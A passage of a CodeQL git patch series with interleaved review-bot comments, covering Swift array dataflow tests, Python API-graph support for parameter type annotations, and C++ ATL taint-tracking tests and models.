| test2.swift:95:14:95:14 | a2 | +| test2.swift:93:5:93:5 | [post] a2 | test2.swift:93:5:93:5 | &... | +| test2.swift:93:5:93:5 | a2 | test2.swift:93:5:93:5 | &... | +| test2.swift:95:5:95:5 | $v$generator | test2.swift:95:5:95:5 | &... | +| test2.swift:95:5:95:5 | &... | test2.swift:95:5:95:5 | $v$generator | +| test2.swift:95:5:95:5 | [post] $v$generator | test2.swift:95:5:95:5 | &... | +| test2.swift:95:9:95:9 | SSA def(v) | test2.swift:96:19:96:19 | v | +| test2.swift:95:9:95:9 | v | test2.swift:95:9:95:9 | SSA def(v) | +| test2.swift:95:14:95:14 | $v$generator | test2.swift:95:14:95:14 | SSA def($v$generator) | +| test2.swift:95:14:95:14 | SSA def($v$generator) | test2.swift:95:5:95:5 | $v$generator | +| test2.swift:95:14:95:14 | [post] a2 | test2.swift:98:21:98:21 | a2 | +| test2.swift:95:14:95:14 | a2 | test2.swift:98:21:98:21 | a2 | +| test2.swift:95:14:95:14 | call to makeIterator() | test2.swift:95:14:95:14 | $v$generator | +| test2.swift:98:5:98:5 | $ix$generator | test2.swift:98:5:98:5 | &... | +| test2.swift:98:5:98:5 | &... | test2.swift:98:5:98:5 | $ix$generator | +| test2.swift:98:5:98:5 | [post] $ix$generator | test2.swift:98:5:98:5 | &... | +| test2.swift:98:9:98:9 | SSA def(ix) | test2.swift:99:22:99:22 | ix | +| test2.swift:98:9:98:9 | ix | test2.swift:98:9:98:9 | SSA def(ix) | +| test2.swift:98:15:98:15 | $ix$generator | test2.swift:98:15:98:15 | SSA def($ix$generator) | +| test2.swift:98:15:98:15 | SSA def($ix$generator) | test2.swift:98:5:98:5 | $ix$generator | +| test2.swift:98:15:98:24 | call to makeIterator() | test2.swift:98:15:98:15 | $ix$generator | +| test2.swift:98:21:98:21 | [post] a2 | test2.swift:99:19:99:19 | a2 | +| test2.swift:98:21:98:21 | [post] a2 | test2.swift:101:20:101:20 | a2 | +| test2.swift:98:21:98:21 | a2 | test2.swift:99:19:99:19 | a2 | +| test2.swift:98:21:98:21 | a2 | test2.swift:101:20:101:20 | a2 | +| test2.swift:99:19:99:19 | &... | test2.swift:99:19:99:19 | a2 | +| test2.swift:99:19:99:19 | &... 
| test2.swift:101:20:101:20 | a2 | +| test2.swift:99:19:99:19 | [post] a2 | test2.swift:99:19:99:19 | &... | +| test2.swift:99:19:99:19 | a2 | test2.swift:99:19:99:19 | &... | +| test2.swift:101:5:101:5 | $generator | test2.swift:101:5:101:5 | &... | +| test2.swift:101:5:101:5 | &... | test2.swift:101:5:101:5 | $generator | +| test2.swift:101:5:101:5 | [post] $generator | test2.swift:101:5:101:5 | &... | +| test2.swift:101:10:101:10 | SSA def(ix) | test2.swift:102:19:102:19 | ix | +| test2.swift:101:10:101:10 | ix | test2.swift:101:10:101:10 | SSA def(ix) | +| test2.swift:101:14:101:14 | SSA def(v) | test2.swift:103:19:103:19 | v | +| test2.swift:101:14:101:14 | v | test2.swift:101:14:101:14 | SSA def(v) | +| test2.swift:101:20:101:20 | $generator | test2.swift:101:20:101:20 | SSA def($generator) | +| test2.swift:101:20:101:20 | SSA def($generator) | test2.swift:101:5:101:5 | $generator | +| test2.swift:101:20:101:34 | call to makeIterator() | test2.swift:101:20:101:20 | $generator | | test.swift:5:9:5:13 | ... as ... | test.swift:5:9:5:9 | t2 | | test.swift:6:9:6:9 | SSA def(t1) | test.swift:7:15:7:15 | t1 | | test.swift:6:9:6:9 | t1 | test.swift:6:9:6:9 | SSA def(t1) | diff --git a/swift/ql/test/library-tests/dataflow/dataflow/test2.swift b/swift/ql/test/library-tests/dataflow/dataflow/test2.swift index cb8bdf16428..a1d9524a604 100644 --- a/swift/ql/test/library-tests/dataflow/dataflow/test2.swift +++ b/swift/ql/test/library-tests/dataflow/dataflow/test2.swift @@ -1,5 +1,5 @@ func source(_ label: String) -> String { return ""; } -func sink(arg: String) {} +func sink(arg: T) {} func testDicts() { let d1 = ["a": "apple", "b": "banana", "c": source("source1")] 
@@ -71,3 +71,35 @@ func testDicts4() { sink(arg: value) } } + +func testArrays1() { + var a1 = ["a", "b", "c", source("source5")] + + for v in a1 { + sink(arg: v) // $ MISSING: flow=source5 + } + for ix in 0 ..< a1.count { + sink(arg: a1[ix]) // $ flow=source5 + } + for (ix, v) in a1.enumerated() { + sink(arg: ix) + sink(arg: v) // $ flow=source5 + } +} + +func testArrays2() { + var a2 = ["a", "b", "c", "d"] + + a2[1] = source("source6") + + for v in a2 { + sink(arg: v) // $ MISSING: flow=source6 + } + for ix in 0 ..< a2.count { + sink(arg: a2[ix]) // $ flow=source6 + } + for (ix, v) in a2.enumerated() { + sink(arg: ix) + sink(arg: v) // $ flow=source6 + } +} From 2734377e5db9f52b9e3ce6c88a5ebeea4acfd1c2 Mon Sep 17 00:00:00 2001 
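Review bot: The two `MISSING: flow=` expectations in `testArrays1` and `testArrays2` are unexplained. Only the direct `for v in a1` / `for v in a2` loops lose the source, while the indexed reads and the `enumerated()` loops in the same functions keep it. A one-line comment above each direct loop, for example `// known gap: element content is not read through for-in over the array itself`, would mark this as a recorded false negative and not an intended result. Separately, `a1` is declared `var` but never mutated in `testArrays1`; if the `var` is deliberate (it may shape the flow graph under test), say so in a comment, otherwise use `let a1 = ...`.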
From: Taus Date: Thu, 21 Nov 2024 16:11:11 +0000 Subject: [PATCH 0714/1267] Python: Add API graph support for parameter annotations Adds API graph support for observing that in ```python def foo(x : Bar): ... ``` The variable `x` is likely to be an instance of the type `Bar` inside this function. In particular, we add `getInstanceFromAnnotation` as a predicate on API graph nodes that tracks this step (corresponding to a new edge type labeled with "annotation" in the API graph), and extend the existing `getAnInstance` predicate to also include instances arising from type annotations. A more complete solution would also add support for annotated assignments (`x : Foo = ...` or just `x : Foo`) as well as track types through type aliases (`type Foo = Bar`). This turns out to be non-trivial, however, as these type constructs don't have any CFG nodes (and so no data-flow nodes by default either). In order to not have perfect be the enemy of good, this commit is only targeting the type parameter case (which is also likely to be the most common use case anyway). The tests for API graphs have been extended accordingly, including tests for the kinds of type ascriptions that we _don't_ currently model in API graphs (marked with `MISSING:` in the inline tests). --- ...-parameter-annotation-api-graph-support.md | 5 ++++ python/ql/lib/semmle/python/ApiGraphs.qll | 23 ++++++++++++++++- .../dataflow/new/internal/LocalSources.qll | 16 ++++++++++++ .../ApiGraphs/py3/test_annotations.py | 25 +++++++++++++++++++ 4 files changed, 68 insertions(+), 1 deletion(-) create mode 100644 python/ql/lib/change-notes/2024-11-26-parameter-annotation-api-graph-support.md create mode 100644 python/ql/test/library-tests/ApiGraphs/py3/test_annotations.py diff --git a/python/ql/lib/change-notes/2024-11-26-parameter-annotation-api-graph-support.md b/python/ql/lib/change-notes/2024-11-26-parameter-annotation-api-graph-support.md new file mode 100644 index 00000000000..57bb1b4a078 --- /dev/null 
+++ b/python/ql/lib/change-notes/2024-11-26-parameter-annotation-api-graph-support.md @@ -0,0 +1,5 @@ +--- +category: feature +--- + +- Added support for parameter annotations in API graphs. This means that in a function definition such as `def foo(x: Bar): ...`, you can now use the `getInstanceFromAnnotation()` method to step from `Bar` to `x`. In addition to this, the `getAnInstance` method now also includes instances arising from parameter annotations. diff --git a/python/ql/lib/semmle/python/ApiGraphs.qll b/python/ql/lib/semmle/python/ApiGraphs.qll index 4385259ca9b..b45c10e1417 100644 --- a/python/ql/lib/semmle/python/ApiGraphs.qll +++ b/python/ql/lib/semmle/python/ApiGraphs.qll @@ -195,6 +195,12 @@ module API { */ Node getReturn() { result = this.getASuccessor(Label::return()) } + /** + * Gets a node representing instances of the class represented by this node, as specified via + * type annotations. + */ + Node getInstanceFromAnnotation() { result = this.getASuccessor(Label::annotation()) } + /** * Gets a node representing the `i`th parameter of the function represented by this node. * @@ -229,7 +235,9 @@ module API { /** * Gets a node representing an instance of the class (or a transitive subclass of the class) represented by this node. */ - Node getAnInstance() { result = this.getASubclass*().getReturn() } + Node getAnInstance() { + result in [this.getASubclass*().getReturn(), this.getASubclass*().getInstanceFromAnnotation()] + } /** * Gets a node representing the result from awaiting this node. @@ -834,6 +842,10 @@ module API { lbl = Label::return() and ref = pred.getACall() or + // Getting an instance via a type annotation + lbl = Label::annotation() and + ref = pred.getAnAnnotatedInstance() + or // Awaiting a node that is a use of `base` lbl = Label::await() and ref = pred.getAnAwaited() 
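Review bot: The doc comment on `getAnInstance()` still describes only "an instance of the class (or a transitive subclass of the class)", but the new body also returns everything reached through `getInstanceFromAnnotation()`. Python annotations are not checked at runtime, so those results are a heuristic, and any model or query that relies on `getAnInstance()` to pick sources or sinks will now also match annotated parameters. The comment should say so, for example by adding `This includes parameters annotated with the class; annotations are not enforced at runtime, so such nodes are a best guess.` The `Node` class that holds this predicate starts and ends outside the hunk.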
@@ -1079,6 +1091,7 @@ module API { } or MkLabelSelfParameter() or MkLabelReturn() or + MkLabelAnnotation() or MkLabelSubclass() or MkLabelAwait() or MkLabelSubscript() or @@ -1148,6 +1161,11 @@ module API { override string toString() { result = "getReturn()" } } + /** A label for annotations. */ + class LabelAnnotation extends ApiLabel, MkLabelAnnotation { + override string toString() { result = "getAnnotatedInstance()" } + } + /** A label that gets the subclass of a class. */ class LabelSubclass extends ApiLabel, MkLabelSubclass { override string toString() { result = "getASubclass()" } @@ -1207,6 +1225,9 @@ module API { /** Gets the `return` edge label. */ LabelReturn return() { any() } + /** Gets the `annotation` edge label. */ + LabelAnnotation annotation() { any() } + /** Gets the `subclass` edge label. */ LabelSubclass subclass() { any() } diff --git a/python/ql/lib/semmle/python/dataflow/new/internal/LocalSources.qll b/python/ql/lib/semmle/python/dataflow/new/internal/LocalSources.qll index 733795478ce..c43a111c9c8 100644 --- a/python/ql/lib/semmle/python/dataflow/new/internal/LocalSources.qll +++ b/python/ql/lib/semmle/python/dataflow/new/internal/LocalSources.qll @@ -119,6 +119,11 @@ class LocalSourceNode extends Node { */ CallCfgNode getACall() { Cached::call(this, result) } + /** + * Gets a node that has this node as its annotation. + */ + Node getAnAnnotatedInstance() { Cached::annotatedInstance(this, result) } + /** * Gets an awaited value from this node. */ @@ -275,6 +280,17 @@ private module Cached { ) } + cached + predicate annotatedInstance(LocalSourceNode node, Node instance) { + exists(ExprNode n | node.flowsTo(n) | + instance.asCfgNode().getNode() = + any(AnnAssign ann | ann.getAnnotation() = n.asExpr()).getTarget() + or + instance.asCfgNode().getNode() = + any(Parameter p | p.getAnnotation() = n.asCfgNode().getNode()) + ) + } + /** * Holds if `node` flows to a value that, when awaited, results in `awaited`. */ 
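Review bot: `LabelAnnotation.toString()` returns `"getAnnotatedInstance()"`, while the predicate this commit adds on `API::Node` for the same edge is `getInstanceFromAnnotation()`. The neighbouring labels print the name of the predicate that follows the edge (`getReturn()`, `getASubclass()`). As far as the visible hunks show, a path printed from the graph would name a predicate that does not exist on `API::Node`. Either return `"getInstanceFromAnnotation()"` here or rename the `Node` predicate, and adjust the inline expectations in test_annotations.py to the chosen name.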
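Review bot: The `AnnAssign` disjunct in `annotatedInstance` is at odds with the commit message, which says annotated assignments are left out because they have no CFG nodes, and the new test marks the assignment cases as `MISSING`. If that branch cannot produce results today, a comment such as `// annotated assignments have no CFG node yet, so this disjunct is currently inert` would spare readers working it out. If it can, the change note and the doc comment on `getAnAnnotatedInstance` should mention assignments as well. The two disjuncts also reach the annotation differently (`n.asExpr()` in one, `n.asCfgNode().getNode()` in the other); using one form in both would read more clearly. The `Cached` module continues outside the hunk.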
diff --git a/python/ql/test/library-tests/ApiGraphs/py3/test_annotations.py b/python/ql/test/library-tests/ApiGraphs/py3/test_annotations.py new file mode 100644 index 00000000000..664096b9d33 --- /dev/null +++ b/python/ql/test/library-tests/ApiGraphs/py3/test_annotations.py @@ -0,0 +1,25 @@ +from types import AssignmentAnnotation, ParameterAnnotation + +def test_annotated_assignment(): + local_x : AssignmentAnnotation = create_x() #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation") + local_x #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation").getAnnotatedInstance() + +global_x : AssignmentAnnotation #$ use=moduleImport("types").getMember("AssignmentAnnotation") +global_x #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation").getAnnotatedInstance() + +def test_parameter_annotation(parameter_y: ParameterAnnotation): #$ use=moduleImport("types").getMember("ParameterAnnotation") + parameter_y #$ use=moduleImport("types").getMember("ParameterAnnotation").getAnnotatedInstance() + +type Alias = AssignmentAnnotation + +global_z : Alias #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation") +global_z #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation").getAnnotatedInstance() + +def test_parameter_alias(parameter_z: Alias): #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation") + parameter_z #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation").getAnnotatedInstance() + +# local type aliases +def test_local_type_alias(): + type LocalAlias = AssignmentAnnotation + local_alias : LocalAlias = create_value() #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation") + local_alias #$ MISSING: use=moduleImport("types").getMember("AssignmentAnnotation").getAnnotatedInstance() From fe9feb900d8351b380c716c837b7500d9477e808 Mon Sep 17 00:00:00 2001 
From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:29:26 +0000 Subject: [PATCH 0715/1267] C++: We will need all these types. --- .../dataflow/taint-tests/atl.cpp | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp new file mode 100644 index 00000000000..58a00385c33 --- /dev/null +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
@@ -0,0 +1,65 @@ +namespace { + template T source(); + template T* indirect_source(); + void sink(...); +} + +typedef unsigned int UINT; +typedef long LONG; +typedef void* LPVOID; +typedef void* PVOID; +typedef bool BOOL; +typedef char* PSTR, *LPSTR; +typedef const char* LPCTSTR; +typedef unsigned short WORD; +typedef unsigned long DWORD; +typedef void* HANDLE; +typedef LONG HRESULT; +typedef unsigned long ULONG; +typedef const char* LPCSTR; +typedef wchar_t OLECHAR; +typedef OLECHAR* LPOLESTR; +typedef const LPOLESTR LPCOLESTR; +typedef OLECHAR* BSTR; +typedef wchar_t* LPWSTR, *PWSTR; +typedef BSTR* LPBSTR; +typedef unsigned short USHORT; +typedef char *LPTSTR; +struct __POSITION { int unused; };typedef __POSITION* POSITION; +typedef WORD ATL_URL_PORT; + +enum ATL_URL_SCHEME{ + ATL_URL_SCHEME_UNKNOWN = -1, + ATL_URL_SCHEME_FTP = 0, + ATL_URL_SCHEME_GOPHER = 1, + ATL_URL_SCHEME_HTTP = 2, + ATL_URL_SCHEME_HTTPS = 3, + ATL_URL_SCHEME_FILE = 4, + ATL_URL_SCHEME_NEWS = 5, + ATL_URL_SCHEME_MAILTO = 6, + ATL_URL_SCHEME_SOCKS = 7 +}; + +using HINSTANCE = void*; +using size_t = decltype(sizeof(int)); +using SIZE_T = size_t; + +#define NULL nullptr + +typedef struct tagSAFEARRAYBOUND { + ULONG cElements; + LONG lLbound; +} SAFEARRAYBOUND, *LPSAFEARRAYBOUND; + +typedef struct tagVARIANT { + /* ... */ +} VARIANT; + +typedef struct tagSAFEARRAY { + USHORT cDims; + USHORT fFeatures; + ULONG cbElements; + ULONG cLocks; + PVOID pvData; + SAFEARRAYBOUND rgsabound[1]; +} SAFEARRAY, *LPSAFEARRAY; From 16e5fa34d17ae874926ac8aa8c6b8d983e547aa1 Mon Sep 17 00:00:00 2001 
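Review bot: `typedef const LPOLESTR LPCOLESTR;` applies `const` to the pointer typedef, so `LPCOLESTR` becomes `OLECHAR* const` (a constant pointer to mutable characters). The name and the sibling `LPCSTR` / `LPCTSTR` typedefs indicate a pointer to const instead. Because this stub stands in for the Windows/ATL types in the taint tests, signatures written against it would differ from the real ones in the constness of the pointee. Spell the type out instead: `typedef const OLECHAR* LPCOLESTR;`.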
From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:30:31 +0000 Subject: [PATCH 0716/1267] C++: Add failing tests with U_STRINGorID. --- .../dataflow/external-models/flow.expected | 10 ++++----- .../external-models/validatemodels.expected | 21 +++++++++++++++++++ .../dataflow/taint-tests/atl.cpp | 21 +++++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 7 +++++++ 4 files changed, 54 insertions(+), 5 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index a3d09178f2c..d1e895f2eaf 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected 
@@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:644 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:642 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:643 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:819 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:817 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:818 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:643 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:818 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:644 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:819 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: 
ReturnValue in buffer | diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index 2e0a493585c..b0276013106 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected 
@@ -1,8 +1,27 @@ +| Dubious member name "operator +=" in summary model. | +| Dubious member name "operator BSTR" in summary model. | +| Dubious member name "operator LPCSTR" in summary model. | +| Dubious member name "operator LPSAFEARRAY" in summary model. | +| Dubious member name "operator LPSTR" in summary model. | +| Dubious member name "operator LPWSTR" in summary model. | +| Dubious member name "operator PCXSTR" in summary model. | +| Dubious member name "operator StringType&" in summary model. | +| Dubious member name "operator T*" in summary model. | +| Dubious member name "operator const StringType&" in summary model. | +| Dubious member name "operator&" in summary model. | | Dubious member name "operator*" in summary model. | +| Dubious member name "operator+=" in summary model. | | Dubious member name "operator->" in summary model. | | Dubious member name "operator=" in summary model. | | Dubious member name "operator[]" in summary model. | +| Dubious signature "(CRegKey&)" in summary model. | +| Dubious signature "(DWORD&,LPCTSTR)" in summary model. | | Dubious signature "(InputIterator,InputIterator,const Allocator &)" in summary model. | +| Dubious signature "(const CComBSTR&)" in summary model. | +| Dubious signature "(const CComSafeArray&)" in summary model. | +| Dubious signature "(const SAFEARRAY&)" in summary model. | +| Dubious signature "(const SAFEARRAY*)" in summary model. | +| Dubious signature "(const SAFEARRAYBOUND*, UINT)" in summary model. | | Dubious signature "(const deque &)" in summary model. | | Dubious signature "(const deque &,const Allocator &)" in summary model. | | Dubious signature "(const forward_list &)" in summary model. | 
@@ -25,3 +44,5 @@ | Dubious signature "(size_type,const T &,const Allocator &)" in summary model. | | Dubious signature "(vector &&)" in summary model. | | Dubious signature "(vector &&,const Allocator &)" in summary model. | +| Dubious signature "operator HKEY" in summary model. | +| Dubious signature "operator=" in summary model. | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 58a00385c33..54e8c65f4c7 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -63,3 +63,24 @@ typedef struct tagSAFEARRAY { PVOID pvData; SAFEARRAYBOUND rgsabound[1]; } SAFEARRAY, *LPSAFEARRAY; + +struct _U_STRINGorID { + _U_STRINGorID(UINT nID); + _U_STRINGorID(LPCTSTR lpString); + + LPCTSTR m_lpstr; +}; + +void test__U_STRINGorID() { + { + UINT x = source(); + _U_STRINGorID u(x); + sink(u.m_lpstr); // $ MISSING: ir + } + + { + LPCTSTR y = indirect_source(); + _U_STRINGorID u(y); + sink(u.m_lpstr); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index b5ddf84747a..7809703f9c8 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
@@ -140,6 +140,13 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | arrayassignment.cpp:145:12:145:12 | 5 | arrayassignment.cpp:145:7:145:13 | access to array | TAINT | | arrayassignment.cpp:146:7:146:10 | arr3 | arrayassignment.cpp:146:7:146:13 | access to array | | | arrayassignment.cpp:146:12:146:12 | 5 | arrayassignment.cpp:146:7:146:13 | access to array | TAINT | +| atl.cpp:32:30:32:30 | 1 | atl.cpp:32:29:32:30 | - ... | TAINT | +| atl.cpp:76:14:76:25 | call to source | atl.cpp:77:21:77:21 | x | | +| atl.cpp:77:21:77:21 | x | atl.cpp:77:21:77:22 | call to _U_STRINGorID | TAINT | +| atl.cpp:77:21:77:22 | call to _U_STRINGorID | atl.cpp:78:10:78:10 | u | | +| atl.cpp:82:17:82:43 | call to indirect_source | atl.cpp:83:21:83:21 | y | | +| atl.cpp:83:21:83:21 | y | atl.cpp:83:21:83:22 | call to _U_STRINGorID | TAINT | +| atl.cpp:83:21:83:22 | call to _U_STRINGorID | atl.cpp:84:10:84:10 | u | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From bf36f00bb0d2c6f75b698628611314abee7c4c39 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:50:30 +0000 Subject: [PATCH 0717/1267] C++: Add model. Observe that flow still fails. --- cpp/ql/lib/ext/CA2CAEX.model.yml | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 cpp/ql/lib/ext/CA2CAEX.model.yml diff --git a/cpp/ql/lib/ext/CA2CAEX.model.yml b/cpp/ql/lib/ext/CA2CAEX.model.yml new file mode 100644 index 00000000000..f199d1fddea --- /dev/null +++ b/cpp/ql/lib/ext/CA2CAEX.model.yml 
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/cpp-all
+ extensible: summaryModel
+ data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance
+ - ["", "_U_STRINGorID", True, "_U_STRINGorID", "(UINT)", "", "Argument[0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"]
+ - ["", "_U_STRINGorID", True, "_U_STRINGorID", "(LPCTSTR)", "", "Argument[*0]", "Argument[-1].Field[*m_lpstr]", "value", "manual"]
From f688470324a5e4e5432c260fee776831e16cf886 Mon Sep 17 00:00:00 2001
From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:53:24 +0000 Subject: [PATCH 0718/1267] C++: Since isConstructedFrom only holds for templates we need to explicitly handle the case where the function (or class) is not a template.
---
.../semmle/code/cpp/dataflow/ExternalFlow.qll | 20 +++++++++++++++---- .../dataflow/taint-tests/atl.cpp | 4 ++-- 2 files changed, 18 insertions(+), 6 deletions(-)
diff --git a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll
index 49610b7c85b..ec25b08856c 100644
--- a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll
+++ b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll
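Review bot: The `(UINT)` row writes `Argument[0]` into `Argument[-1].Field[*m_lpstr]`, that is, into what the pointer field points to, but an integer resource ID has no pointee. It is presumably stored in the pointer value itself, so `Argument[-1].Field[m_lpstr]` looks like the matching output, while the `(LPCTSTR)` row rightly keeps `Field[*m_lpstr]`. Separately, the file is named `CA2CAEX.model.yml` although both rows model `_U_STRINGorID`; a file named after the modelled type would make the rows easier to find when auditing which constructors propagate taint.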
@@ -434,18 +434,30 @@ private predicate elementSpec( summaryModel(namespace, type, subtypes, name, signature, ext, _, _, _, _, _) } +private predicate isClassConstructedFrom(Class c, Class templateClass) { + c.isConstructedFrom(templateClass) + or + not any(Class c_).isConstructedFrom(templateClass) and c = templateClass +} + +private predicate isFunctionConstructedFrom(Function f, Function templateFunc) { + f.isConstructedFrom(templateFunc) + or + not any(Function f_).isConstructedFrom(templateFunc) and f = templateFunc +} + /** Gets the fully templated version of `f`. */ private Function getFullyTemplatedFunction(Function f) { not f.isFromUninstantiatedTemplate(_) and ( exists(Class c, Class templateClass, int i | - c.isConstructedFrom(templateClass) and + isClassConstructedFrom(c, templateClass) and f = c.getAMember(i) and result = templateClass.getCanonicalMember(i) ) or not exists(f.getDeclaringType()) and - f.isConstructedFrom(result) + isFunctionConstructedFrom(f, result) ) } @@ -489,7 +501,7 @@ private string getTypeNameWithoutFunctionTemplates(Function f, int n, int remain private string getTypeNameWithoutClassTemplates(Function f, int n, int remaining) { // If there is a declaring type then we start by expanding the function templates exists(Class template | - f.getDeclaringType().isConstructedFrom(template) and + isClassConstructedFrom(f.getDeclaringType(), template) and remaining = template.getNumberOfTemplateArguments() and result = getTypeNameWithoutFunctionTemplates(f, n, 0) ) @@ -501,7 +513,7 @@ private string getTypeNameWithoutClassTemplates(Function f, int n, int remaining or exists(string mid, TemplateParameter tp, Class template | mid = getTypeNameWithoutClassTemplates(f, n, remaining + 1) and - f.getDeclaringType().isConstructedFrom(template) and + isClassConstructedFrom(f.getDeclaringType(), template) and tp = template.getTemplateArgument(remaining) and result = mid.replaceAll(tp.getName(), "class:" + remaining.toString()) ) 
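Review bot: The new helpers `isClassConstructedFrom` and `isFunctionConstructedFrom` have no QLDoc, and their second disjunct is not obvious from the name: it holds with `c = templateClass` for any class that nothing is constructed from, which covers ordinary non-template classes but also a template that is never instantiated. I would add `/** Holds if `c` is constructed from `templateClass`, or if `c` is `templateClass` itself and no class is constructed from it. */` and the equivalent line on the function variant. The two later hunks in this file only switch call sites in `getTypeNameWithoutClassTemplates` to the class helper; that predicate starts outside the hunks, so whether the never-instantiated case matters there cannot be judged from what is shown.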
diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 54e8c65f4c7..c0507d3032d 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -75,12 +75,12 @@ void test__U_STRINGorID() { { UINT x = source(); _U_STRINGorID u(x); - sink(u.m_lpstr); // $ MISSING: ir + sink(u.m_lpstr); // $ ir } { LPCTSTR y = indirect_source(); _U_STRINGorID u(y); - sink(u.m_lpstr); // $ MISSING: ir + sink(u.m_lpstr); // $ ir } } From 749602c98216cc08223d55a9f00443517279af9a Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 26 Nov 2024 17:54:54 +0000 Subject: [PATCH 0719/1267] C++: Add failing tests with CA2AEX and friends. --- .../dataflow/taint-tests/atl.cpp | 82 +++++++++++++++++++ 1 file changed, 82 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index c0507d3032d..d05a2f22a01 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
